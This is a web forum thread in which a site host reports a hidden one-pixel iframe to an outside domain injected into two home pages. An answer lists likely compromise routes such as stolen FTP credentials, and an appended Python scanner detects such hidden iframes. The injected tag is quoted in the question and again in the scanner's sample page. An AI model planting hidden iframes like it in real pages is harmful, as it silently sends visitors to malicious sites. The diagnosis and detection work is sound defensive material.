On two websites which I host for a friend, I found that there is an iframe at the bottom of each site's index.htm file.

<iframe src="http://www.kunstsalen.dk" width=1 height=1
style="visibility: hidden; position: absolute;"></iframe>

This isn't something that should be on his home pages. It is causing a security warning to show up in browsers which says that his website is a virus/infected site. How did this get there? He has FTP access and both files changed on 11/5/2011 at about the same time. Could he have a virus which changed his local index.htm files and he uploaded them unknowingly? Could a virus use his saved FTP information to log in and change the files without him knowing?

The reason I assume it originated from his machine is that I have over 500 other index.htm files on my server and none of them were affected. Only the two index.htm files which are accessible through his FTP account.

Rush Frisby

1 Answer

There can be several scenarios (hard to tell without knowing more).

  1. Your friend's FTP credentials were stolen and someone logged in and uploaded modified versions of these files. This can be a keylogger on one of his computers (as an example).

  2. Your friend's other credentials were stolen (e-mail?) and were used to gain access to the web site. This can be access to the management console and/or SSH.

  3. Your friend's provider was hacked and there were several customers affected.

  4. Your friend has a virus on his computer that modifies specific files (e.g. *.php) by appending this iframe.

etc

DmitryK
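
A check a server owner could run in this situation, added here as an example (it is not code from either poster): it parses each page and reports iframes that load another host while being concealed, as the tag in the question is. The names `find_hidden_iframes`, `scan_tree` and `own_hosts`, and the `example.org`/`example.net` hosts in the sample page, are assumptions made for the example.

```python
import re
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

HIDING_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

class IframeAudit(HTMLParser):
    """Collects iframes that load another host and are concealed from the visitor."""
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []  # (line, host, reasons)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        reasons = []
        if any(a.get(d, "").strip().rstrip("px") in ("0", "1") for d in ("width", "height")):
            reasons.append("tiny-size")
        if HIDING_STYLE.search(a.get("style", "")):
            reasons.append("hidden-style")
        # A visible off-site embed (map, video) is normal; off-site AND hidden is not.
        if host and host not in self.own_hosts and reasons:
            self.findings.append((self.getpos()[0], host, reasons))

def find_hidden_iframes(html, own_hosts):
    parser = IframeAudit(own_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings

def scan_tree(root, own_hosts, patterns=("*.htm", "*.html", "*.php")):
    """Return {path: findings} for every matching file under root that has a hit."""
    hits = {}
    for pattern in patterns:
        for path in Path(root).rglob(pattern):
            found = find_hidden_iframes(path.read_text(errors="replace"), own_hosts)
            if found:
                hits[str(path)] = found
    return hits

# Constructed sample page: a legitimate visible embed, then the tag quoted in the question.
SAMPLE = '''<html><body>
<h1>Welcome</h1>
<iframe src="http://maps.example.net/embed" width="400" height="300"></iframe>
</body></html>
<iframe src="http://www.kunstsalen.dk" width=1 height=1
style="visibility: hidden; position: absolute;"></iframe>
'''
```

Running `scan_tree` over every account's web root shows whether only the files reachable through one FTP account carry the tag, which is the comparison the question makes by hand.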